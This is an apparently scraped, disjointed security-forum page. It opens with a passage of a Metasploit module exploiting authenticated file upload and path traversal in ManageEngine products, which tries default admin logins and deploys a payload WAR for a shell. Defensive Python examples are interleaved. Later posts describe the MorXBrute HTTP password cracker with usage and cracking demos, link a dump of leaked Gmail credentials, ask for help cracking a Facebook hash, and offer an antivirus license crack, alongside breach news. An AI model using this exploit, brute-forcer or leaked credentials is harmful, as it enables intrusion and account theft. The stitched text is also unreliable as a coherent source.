    # TODO: put fixed version on the two ifs below once (if...) products are fixed
    # sd was fixed on build 9031
    # ae and sc still not fixed
    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
        (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
        (version[3] == 'sc' && version[2] < 99999)
      return Exploit::CheckCode::Appears
    end

    if (version[2] > 9030 && version[3] == 'sd') ||
        (version[2] > 99999 && version[3] == 'ae') ||
        (version[2] > 99999 && version[3] == 'sc')
      return Exploit::CheckCode::Safe
    else
      # An IT360 check always lands here, there is no way to get the version easily
      return Exploit::CheckCode::Unknown
    end
  end

  def authenticate_it360(port, path, username, password)
    if datastore['DOMAIN_NAME'] == nil
      vars_post = {
        'LOGIN_ID'    => username,
        'PASSWORD'    => password,
        'isADEnabled' => 'false'
      }
    else
      vars_post = {
        'LOGIN_ID'    => username,
        'PASSWORD'    => password,
        'isADEnabled' => 'true',
        'domainName'  => datastore['DOMAIN_NAME']
      }
    end

    res = send_request_cgi({
      'rport'     => port,
      'method'    => 'POST',
      'uri'       => normalize_uri(path),
      'vars_get'  => {
        'service'   => 'ServiceDesk',
        'furl'      => '/',
        'timestamp' => Time.now.to_i
      },
      'vars_post' => vars_post
    })

    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
      return res.get_cookies
    else
      return nil
    end
  end

  def get_it360_cookie_name
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("/")
    })

    cookie = res.get_cookies
    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
      return $1
    else
      return nil
    end
  end

  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
      return cookie
    end

    # get the correct path, host and port
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('/')
    })

    if res && res.redirect?
      uri = [ res.redirection.port, res.redirection.path ]
    else
      return nil
    end

    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])

    if cookie != nil
      return cookie
    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
      # we've tried with the default guest password, now let's try with the default admin password
      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
      if cookie != nil
        return cookie
      else
        # Try one more time with the default admin login for some versions
        cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
        if cookie != nil
          return cookie
        end
      end
    end

    nil
  end

  #
  # Authenticate and validate our session cookie. We need to submit credentials to
  # j_security_check and then follow the redirect to HomePage.do to create a valid
  # authenticated session.
  #
  def authenticate(cookie, username, password)
    res = send_request_cgi!({
      'method'    => 'POST',
      'uri'       => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
      'ctype'     => 'application/x-www-form-urlencoded',
      'cookie'    => cookie,
      'vars_post' => {
        'j_username'      => username,
        'j_password'      => password,
        'logonDomainName' => datastore['DOMAIN_NAME']
      }
    })

    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
      # sd and ae respond with 302 while sc responds with a 200
      return true
    else
      return false
    end
  end

  def login
    # Do we already have a valid cookie? If yes, just return that.
    if datastore['JSESSIONID'] != nil
      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
      return cookie
    end

    # First we get a valid JSESSIONID to pass to authenticate()
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('/')
    })

    if res && res.code == 200
      cookie = res.get_cookies
      authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
      if authenticated
        return cookie
      elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
        # we've tried with the default guest password, now let's try with the default admin password
        authenticated = authenticate(cookie, 'administrator', 'administrator')
        if authenticated
          return cookie
        else
          # Try one more time with the default admin login for some versions
          authenticated = authenticate(cookie, 'admin', 'admin')
          if authenticated
            return cookie
          end
        end
      end
    end

    nil
  end

  def send_multipart_request(cookie, payload_name, payload_str)
    if payload_name =~ /\.ear/
      upload_path = '../../server/default/deploy'
    else
      upload_path = rand_text_alpha(4+rand(4))
    end

    post_data = Rex::MIME::Message.new
    if @my_target == targets[1]
      # old style
      post_data.add_part(payload_str, 'application/octet-stream', 'binary',
        "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
    else
      post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
      post_data.add_part(payload_str, 'application/octet-stream', 'binary',
        "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
    end

    data = post_data.to_s

    res = send_request_cgi({
      'uri'    => normalize_uri(@my_target['attachment_path']),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie
    })

    return res
  end

  def pick_target
    return target if target.name != 'Automatic'

    version = get_version
    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
        (version[0] == 4 && version[3] == 'ae') ||
        (version[3] == 'sc')
      # These are all "old style" versions (sc is always old style)
      return targets[1]
    elsif version[3] == 'it'
      return targets[3]
    else
      return targets[2]
    end
  end

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
    end

    print_status("#{peer} - Selecting target...")
    @my_target = pick_target
    print_status("#{peer} - Selected target #{@my_target.name}")

    if @my_target == targets[3]
      cookie = login_it360
    else
      cookie = login
    end

    if cookie.nil?
      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
    end

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
    app_xml << '<application>'
    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
    ear_file.add_file('META-INF/application.xml', app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'

    if @my_target != targets[3]
      # Linux doesn't like it when we traverse non existing directories,
      # so let's create them by sending some random data before the EAR.
      # (IT360 does not have a Linux version so we skip the bogus file for it)
      print_status("#{peer} - Uploading bogus file...")
      res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
      if res && res.code != 200
        fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
      end
    end

    # Now send the actual payload
    print_status("#{peer} - Uploading EAR file...")
    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end

Source : ManageEngine Multiple Products Authenticated File Upload - Packet Storm
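The root cause the module above relies on is an attachment handler that joins the client-supplied `module` field (and the part's filename) onto its storage directory without checking for `../`. As an added example that is not part of the Metasploit module or of ManageEngine's code, here is that flaw beside the hardened form a defender would want: allow-list both components, then verify the resolved path is still inside the attachment directory. The base directory `/srv/sdp/attachments` is a constructed placeholder, not the product's real path.

```python
import os

# Constructed attachment directory for the example; the real install path is not on the page.
BASE_DIR = "/srv/sdp/attachments"

# The exact value the module sends in the 'module' multipart field for the EAR upload.
TRAVERSAL_MODULE = "../../server/default/deploy"


class UnsafeUploadPath(ValueError):
    """Raised when the 'module' field or the filename would escape the attachment directory."""


def vulnerable_attachment_path(base_dir: str, module: str, filename: str) -> str:
    """Mirrors the flaw the module abuses: the 'module' field and the filename are
    joined onto the attachment directory with no checking, so '../' sequences
    walk out of it and the file lands wherever the client chose."""
    return os.path.normpath(os.path.join(base_dir, module, filename))


def safe_attachment_path(base_dir: str, module: str, filename: str) -> str:
    """Hardened form: allow-list each component, then confirm containment."""
    # 1. The stored name must be a bare file name: no separators, no '.'/'..', no NUL.
    if filename in ("", ".", "..") or any(ch in filename for ch in "/\\\x00"):
        raise UnsafeUploadPath(f"rejected filename {filename!r}")
    # 2. The module/folder selector is a single path component from a tight charset.
    if not module or not all(ch.isalnum() or ch in "-_" for ch in module):
        raise UnsafeUploadPath(f"rejected module {module!r}")
    # 3. Defence in depth: resolve the result and check it is still under base_dir,
    #    which also catches symlinks inside the attachment tree.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, module, filename))
    if os.path.commonpath([base, target]) != base:
        raise UnsafeUploadPath(f"{target} escapes {base}")
    return target


def upload_is_allowed(base_dir: str, module: str, filename: str) -> bool:
    """Boolean wrapper around safe_attachment_path for policy checks and tests."""
    try:
        safe_attachment_path(base_dir, module, filename)
        return True
    except UnsafeUploadPath:
        return False


if __name__ == "__main__":
    # Vulnerable join: the EAR is written into the application server's deploy dir.
    print(vulnerable_attachment_path(BASE_DIR, TRAVERSAL_MODULE, "x.ear"))
    # Hardened join: the same request is refused.
    print(upload_is_allowed(BASE_DIR, TRAVERSAL_MODULE, "x.ear"))
    print(safe_attachment_path(BASE_DIR, "abcd", "report.pdf"))
```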
  12. Hello everyone. I have a problem with Reaver for a WPA network... it retries the same password 012345670 endlessly. Oddly, with WPA2 it doesn't do that... what could the problem be?
  13. According to the Daily Dot, nearly 5 million usernames and passwords to Gmail accounts have been leaked on a Russian Bitcoin forum. Here's what you should know. The list has since been taken down, and there's no evidence that Gmail itself was hacked—just that these passwords have been leaked. Most sources are saying that lots of the information is quite old, so chances are they were leaked long ago—though others are claiming 60% of the passwords are still valid (not to mention really, really horrible). Source: LikeHacker Download link: google_5000000.7z — RGhost — file sharing
  14. Does anyone know how I can decrypt a Facebook password - like - 301b9c4c93ef05f347d052fa40f80c64c5fb0b94 ?
  15. Description: MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl. MorXBrute comes with a few payloads for some of the most popular software and additionally lets you add your own payload for your favorite HTTP software or website. MorXBrute supports both GET and POST brute forcing. MorXBrute was written for educational, demonstration and testing purposes only. The author cannot be held responsible for any malicious use or damage. You can redistribute it and/or modify it under the same terms as Perl itself.

Author: Simo Ben youssef <Simo_at_morxploit_dot_com>
MorXploit Research
Version: MorXBrute v1.01 Beta
MD5: b4ea3c6895b9996b72309cc91a5910f8
Release date: November 08 2013
Download: Link 1 Link 2
Requirements: Perl 5 or older
Additional modules: None

Usage:
perl MorXBrute.pl <target:port> <user> <wordlist> <payload file>
perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1
perl MorXBrute.pl update

Payloads: As of version 1.01 MorXBrute includes payloads for: Bitrix, cPanel, everyone email platform, Horde, Moodle, Wordpress, Xoops, Zimbra. However, the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others; please read below and feel free to contact me if you need help.

How to generate Payloads:
Generating your own payload for your target requires a little work; right now MorXBrute can't do that for you, but I'm considering adding a payload generator in the future. MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script; MorXBrute then proceeds to read the server's response for each request. The server's response changes just as login parameters do, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt. In some other cases, some scripts like joomla will assign a cookie and redirect you to the administration page either way, before the script validates the login cookie. This makes brute forcing slower and is not supported by MorXBrute.

First you will need a network sniffer, or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep, which can be downloaded from: ngrep - network grep, or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/Centos. You can then run it to capture your target traffic to analyze by running:

ngrep -q -d interface -W byline host target and port 80 > target.log
ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log

At the login page, send two requests, one with valid login credentials and a second with false login credentials. Once done, go back and check your ngrep logs and gather the following (in the wordpress example).

login script path:
POST /wp-login.php
Or when GET is used (not in wordpress case):
GET /someotherscript.php

posted data:
log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1
or
log=admin&pwd=somelamepassword
when GET is used (again not in wordpress case):
GET /someotherscript.php?log=admin&pwd=somelamepassword

On the successful login attempt log, check the rest of the response headers to see if the server responded with a new location. Example:

Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly.
Location: http://testserver/wp-admin/ <-------- HERE
Content-Length: 0
Connection: close

On the failed login attempt log, check also for the location response. If you can't find the location response in the failed login log then bingo, that's the server telling you that your password works, and that's our key! Otherwise, if the server responds with the same location either way then it's probably trying to validate the newly assigned cookie on the next step. In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests; in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example), and add it in the payload as Welcome(.*?)to

Payload file structure:
The structure is very simple, there are 4 values separated by comma ","
1- POST: HTTP method (could be either POST or GET)
2- login.php: the login script path
   Note: this is the full path; if your script is installed in a subdirectory then you should include that too. For example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php)
3- login parameters (login and password)
   Note: $user and $pwd are used by MorXBrute and should not be changed
4- MorXploit: Cookie value, change if required by the remote login
5- Regex key

POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*)

Note: Although wordpress takes other data parameters besides log and pwd such as redirect_to and testcookie, it only requires those first two.

Demo:

POST Method:
root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1
===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================
[*] target set to demo.opensourcecms.com:80
[*] user set to admin
[*] Wordlist set to word.lst
[*] payload set to payloads/wordpressv3.7.1
[+] Cracking …
[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
[-] x3demob -> Failed
============================================================
[+] CRACKED! Your password is demo123
[+] Found at line 10 of word.lst
[+] Cracked in 6 seconds
============================================================

GET Method:
root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0
===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================
[*] target set to x3demob.cpx3demo.com:2082
[*] user set to x3demob
[*] Wordlist set to word.lst
[*] payload set to payloads/cpanelgetprov1.0
[+] Cracking …
[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
============================================================
[+] CRACKED! Your password is x3demob
[+] Found at line 9 of word.lst
[+] Cracked in 4 seconds
============================================================

TODO:
Add SSL support
Add a payload generator
And maybe more?

Submit your payloads: Your contribution is needed!
Please submit your payloads to simo_at_morxploit_com Make sure to include software/service details such as name, URL and version number Also please feel free to submit all your suggestions and bugs. Thanks and happy MorXBruteForcing! Source: MorXBrute HTTP Password cracking tool
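The defender's view of the traffic pattern described above (a burst of POSTs to the login script, with success signalled by a 302 redirect carrying a Location header), as an added example that is not part of MorXBrute or the original post: it scans constructed web-server access log lines and flags a source address that sends many failed login POSTs to /wp-login.php and then receives a redirect. The combined-log line format, the "failed login answers with 200" convention, the threshold and the sample lines are all assumptions.

```python
import re
from collections import defaultdict

# Combined-log-style access log line (assumed format):
# <ip> - - [<time>] "<method> <path> HTTP/1.1" <status> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

LOGIN_PATHS = {"/wp-login.php"}   # login scripts to watch (assumption)
FAIL_THRESHOLD = 5                # failed POSTs from one IP before it is a burst


def parse_line(line):
    """Return a dict of fields for one access log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_bruteforce(lines, paths=LOGIN_PATHS, threshold=FAIL_THRESHOLD):
    """Walk the log in order and count login POSTs per source IP.

    Assumption: a failed login re-renders the form (HTTP 200), while a successful
    one answers 302 with a Location header (the behaviour the post relies on).
    Returns {ip: {"failed": n, "success_after_failures": bool}} for every IP
    whose failed count reached the threshold.
    """
    state = defaultdict(lambda: {"failed": 0, "success_after_failures": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] not in paths:
            continue
        s = state[rec["ip"]]
        if rec["status"] == "200":
            s["failed"] += 1
        elif rec["status"] == "302" and s["failed"] >= threshold:
            s["success_after_failures"] = True   # guessed credential after a burst
    return {ip: s for ip, s in state.items() if s["failed"] >= threshold}


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '198.51.100.4 - - [08/Nov/2013:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3452',
    '198.51.100.4 - - [08/Nov/2013:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
] + [
    f'203.0.113.7 - - [08/Nov/2013:10:01:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3452'
    for i in range(6)
] + [
    '203.0.113.7 - - [08/Nov/2013:10:01:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [08/Nov/2013:10:01:07 +0000] "GET /wp-admin/ HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for ip, s in detect_bruteforce(SAMPLE_LOG).items():
        flag = "CREDENTIAL GUESSED" if s["success_after_failures"] else "failed burst only"
        print(f"{ip}: {s['failed']} failed login POSTs, {flag}")
```

The single mistyped password from 198.51.100.4 stays below the threshold and is not reported; the six failures followed by a 302 from 203.0.113.7 are.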
  16. An alarmingly large security flaw made its way past Tumblr's oversight. Ever logged in to Tumblr on your iPhone or iPad? How about while logged in on a public Wi-Fi connection? If you answered yes to any of the above, you may want to change your Tumblr password ASAP. Tumblr has just made users aware of a serious privacy compromise that enables anybody with the ability to “sniff” traffic on public Wi-Fi networks to view Tumblr users’ passwords in unencrypted plain-text format. The problem arose because the iPad and iPhone apps fail to log users in through a secure server. An official Tumblr announcement urges Tumblr users to change their passwords immediately if they’ve used the app, and to download the newest version of the app as soon as possible: According to the Register, a reader found the bug by chance while evaluating the Tumblr apps for suitable use on his employer’s smartphones. It’s a surprisingly enormous security hole for the Yahoo-bought company to overlook. Anybody who has ever accessed Tumblr over public Wi-Fi from a mobile device, whether at an airport, a coffee shop, or a library, is at risk. Fortunately, Tumblr users don’t seem to be reporting any serious consequences. The Tumblr #password and #security tags abound with users spreading the news, but not with sob stories about compromised accounts. Even if a user does find her account has been compromised, it will be hard to peg it on this security breach in particular. Via: Time To Change Your Tumblr Password—Immediately – ReadWrite
  17. Along with the password day post written by em, an article about passwords appeared in the same sphere. Article source: Ars Technica

Does your password go up to 11? Probably not. But one day it could. If you've ever been nagged about the weakness of your password while changing account credentials on Google, Facebook, or any number of other sites, you may have wondered: do these things actually make people choose stronger passcodes? A team of scientists has concluded that the meters do work—or at least they have the potential to do so, assuming they're set up correctly. The researchers—from the University of California at Berkeley, the University of British Columbia in Vancouver, and Microsoft—are among the first to test the effect that the ubiquitous password meters have on real users choosing passwords. They found that meters grading the strength of passwords had a measurable impact in helping users pick stronger passcodes that weren't used on other accounts. But the group also discovered these new, stronger passwords weren't any harder for users to remember than weaker ones. The scientists were quick to point out caveats to their findings. For one, the meters provided little benefit when users were choosing passwords while setting up a new account, as opposed to changing passwords for an already established account. And the meters provided no improvement for accounts people considered unimportant. "Within that context they're much more likely to just enter a password that they already used elsewhere because they either don't care about those accounts or that's just normally what they do when they enroll in a new account," Serge Egelman, a research scientist at UC Berkeley and the lead author of the paper, told Ars. "Whereas we show that in a different context—when changing passwords for high-value accounts—then the meters actually do have an observable effect on behavior in that people do choose stronger passwords. 
And ironically that's the context where we're least likely to see real meters in real life." The researchers' paper—titled Does My Password Go up to Eleven? The impact of Password Meters on Password Selection—is important because it provides useful guidance to both end users and the security professionals who work to protect them. While more and more sites now offer these meters, Egelman said a surprising number of online banking services and corporate intranets don't yet offer them. Remarkably, neither Microsoft Windows nor Apple's OS X for Macs uses meters for users who are choosing or changing account passwords. The findings come from an experiment in which affiliates of the University of British Columbia were brought to a laboratory and asked to test the usability of a portal that students, faculty, and staff use to access e-mail, view grades, and check out library books. As soon as they successfully logged into their account, they were presented with a notice requiring them to change their password. While the plaintext was never recorded, the laboratory computer did store a cryptographic hash of the passwords. It also measured other characteristics of both the old and new passwords, including the length and whether they used upper- and lower-case letters, numbers, and special characters. Some of the subjects were presented with one of two types of password meters that rated the strength of the new password, while a control group saw no meter at all. The password meters presented to the test subjects used "zero-order entropy," a technique many meters use to measure password strength. One set of "existing motivator" meters used the measures to rate passwords as "weak," "medium," or "strong." A second set of "peer-pressure motivator" meters used the same data to present the strength of the new password relative to all the users of the system. 
It turns out that the subjects who were presented with either type of meter picked significantly "stronger" passwords than those in the control group. The average zero-order entropy of passwords chosen with guidance from the existing motivator meter increased to 60.8 and the entropy of passwords chosen with the peer-pressure motivator grew to 64.9 bits. This means the total number of combinations required to brute-force crack the passwords would be 2^60.8 and 2^64.9 respectively. Subjects who saw no meter at all chose passwords that on average were 49.3 bits strong, about the same as the old passwords from all three groups. "Overall, we observed that both password meters yielded statistically significant differences when compared to the control condition," the researchers reported in the paper. (The findings were recently presented at the ACM SIGCHI Conference on Human Factors in Computing Systems in Paris.) In addition to increasing entropy metrics, the researchers found other indications of improved strength. Passwords generated with the help of meters increased from a median of 9.0 to 10.0 characters, included more special characters, and contained more lower-case letters (from a median of 6.0 to 7.0). "Thus, the meters motivated participants to create longer passwords through the inclusion of symbols and additional lower-case letters," the researchers said. The subjects were invited back to the laboratory two weeks later and another encouraging finding came up. Those who had chosen stronger passwords with the help of the meter had no more trouble remembering their new passcodes than those who had chosen weaker passwords without using a meter. What's more, those with stronger passwords were no more likely to have reverted back to their old one than those who had chosen weaker passwords.

Building a better mousetrap

It's encouraging to know that password meters have a measurable effect on the passwords chosen by end users. 
But sadly there's no guarantee meters will actually help people choose passcodes that are more resistant to real-world cracking techniques. That's because the widely used zero-order entropy rating system is a poor metric for measuring the strength of passwords. The strength of the passcodes "Pa$$word1" and "$ecretPa$$word1" (minus the quotes) is 59.1 bits and 98.5 bits respectively. That's much higher than many passwords offer. What the scoring system fails to account for is that both passwords are so widely used that they're inevitably included in wordlists used in cracking attacks. These are among the first passwords to fall in typical cracking attacks. By contrast, the password "lkx8q2pe0" is considerably stronger because it would require time-consuming brute-force techniques to crack it, and yet it offers just 46.5 bits. (Bits are calculated by x * log_2(y), where x is the number of characters in a passcode and y is the number of available letters, numbers, or special characters.) What this means is that password meters have the ability to help end users choose more crack-resistant passcodes only if the meters are set up correctly. As Ars documented last week, a password advice site from Intel can't be trusted to help users pick passcodes because the methodology it uses is hopelessly flawed. The password meters used in the study and offered on many sites suffer from the same type of weakness, but there's no reason they can't be drastically improved—for instance, by banning the one million most commonly used words. Egelman said there's no evidence to suggest improved meters wouldn't generate the same measurable effect in guiding people's choice of passwords. "They don't know what algorithm we're using to drive the meter," he said. "They just know that they do some behavior, they get some feedback, and they keep trying until [they get] feedback they're happy with. I suspect that if we changed what the feedback is based on we would still have the impact on them."
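The article's x * log_2(y) metric and its blind spot, worked through as an added example (not code from Ars or the researchers): the zero-order entropy calculation reproduces the three figures quoted above, and a wordlist check of the kind Egelman suggests overrides it. The 33-character special pool (95 printable ASCII minus 62 alphanumerics), the tiny stand-in common-password list and the weak/medium/strong thresholds are assumptions.

```python
import math

# Character classes and pool sizes y for the x * log2(y) formula.
# The 33-symbol special pool is an assumption; it reproduces the article's
# 59.1 / 98.5 / 46.5 bit figures exactly.
CLASSES = (
    (str.islower, 26),
    (str.isupper, 26),
    (str.isdigit, 10),
)
SPECIAL_POOL = 33

# Constructed stand-in for a "one million most common passwords" list (assumption).
COMMON_PASSWORDS = {"password", "pa$$word1", "$ecretpa$$word1", "123456", "qwerty"}


def pool_size(password):
    """y: sum of the pool sizes of every character class present in the password."""
    y = sum(size for pred, size in CLASSES if any(pred(ch) for ch in password))
    if any(not any(pred(ch) for pred, _ in CLASSES) for ch in password):
        y += SPECIAL_POOL        # at least one non-alphanumeric character
    return y


def zero_order_entropy(password):
    """Bits = x * log2(y), with x the length and y the pool size."""
    y = pool_size(password)
    return len(password) * math.log2(y) if y else 0.0


def naive_rating(bits):
    """What a plain zero-order-entropy meter reports (thresholds are assumptions)."""
    return "weak" if bits < 40 else "medium" if bits < 60 else "strong"


def improved_rating(password, common=COMMON_PASSWORDS):
    """The same meter with a wordlist ban in front of it: a hit is always 'weak'."""
    bits = zero_order_entropy(password)
    if password.lower() in common:
        return "weak", bits
    return naive_rating(bits), bits


if __name__ == "__main__":
    for pw in ("Pa$$word1", "$ecretPa$$word1", "lkx8q2pe0"):
        bits = zero_order_entropy(pw)
        print(f"{pw:16} {bits:5.1f} bits  naive={naive_rating(bits):7}"
              f" improved={improved_rating(pw)[0]}")
```

"$ecretPa$$word1" scores 98.5 bits and "strong" on the naive meter yet "weak" on the improved one, while "lkx8q2pe0" keeps its modest 46.5-bit rating because nothing but brute force finds it.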
  18. The question-and-answer site informs users that some of their passwords may have been breached in a security intrusion. Formspring has suffered a security intrusion in which some of its user passwords may have been breached, the question-and-answer site warned today. Formspring, which said it only learned of the network intrusion this morning, responded by disabling all users' passwords. "We apologize for the inconvenience but prefer to play it safe and have asked all members to reset their passwords," Formspring founder and CEO Ade Olonoh said in a company blog post. "Users will be prompted to change their passwords when they log back into Formspring." A Formspring spokesperson told CNET that the company was tipped off to the breach by someone who spotted about 420,000 passwords posted to a security forum that appeared to come from Formspring. "Once we were able to verify that the hashes were obtained from Formspring, we locked down our systems and began an investigation to determine the nature of the breach," Dorothee Fisher said. "We found that someone had accessed one of our development servers and was able to extract account information from a production database. We were able to immediately fix the hole and are reviewing our internal security policies and practices to help ensure that this never happens again." The San Francisco-based startup, which launched its site in 2009, announced earlier this year that it had nearly 28 million users. In the blog's comments section, many dissatisfied users expressed a desire to have their accounts deleted, but a company representative assured them that their passwords had all been "salted," a cryptography technique that makes it harder to uncover the actual password. The blog went on to give users a tutorial in creating strong passwords -- a helpful reminder in the wake of more high-profile password thefts at LinkedIn, eHarmony, and Last.fm. Their users' passwords were among approximately 8 million posted in two separate lists to hacker sites in early June. It appears that while they were hashed, they were not salted.

Source: Formspring disables user passwords in security breach | Security & Privacy - CNET News
  19. 
<html>
<head>
<script type="text/javascript">
function show_prompt() {
    // Ask for the password; the prompt field is pre-filled with asterisks.
    var pass = prompt("Password?", "******");
    var pass1 = "rst";
    if (pass === pass1) {
        document.write("<p>The password is: " + pass + "! Bravo!!!</p>");
    } else {
        document.write("<p>Wrong! " + pass + "</p>");
    }
}
</script>
</head>
<body>
<p>Password:</p>
<input type="button" onclick="show_prompt()" value="Login" />
</body>
</html>

What is the password? PS: Let the noobs try!
  20. Find the password! Good luck. site.html - Solidfiles. PM me for a hint! Hint1: HTML Password Lock. Hint2: username = Admin
  21. NOD32 v4 + autoupdate user&pass. Download Link: MEGAUPLOAD.COM
Installation guide:
1. Install "ESET NOD32 Antivirus 4.0.314.0 32 bits"
2. Install "TNod-1.4.0.15-setup" (this adds the user and pass to NOD automatically)
3. The first time you have to update the db manually; after that it updates by itself.
*original post*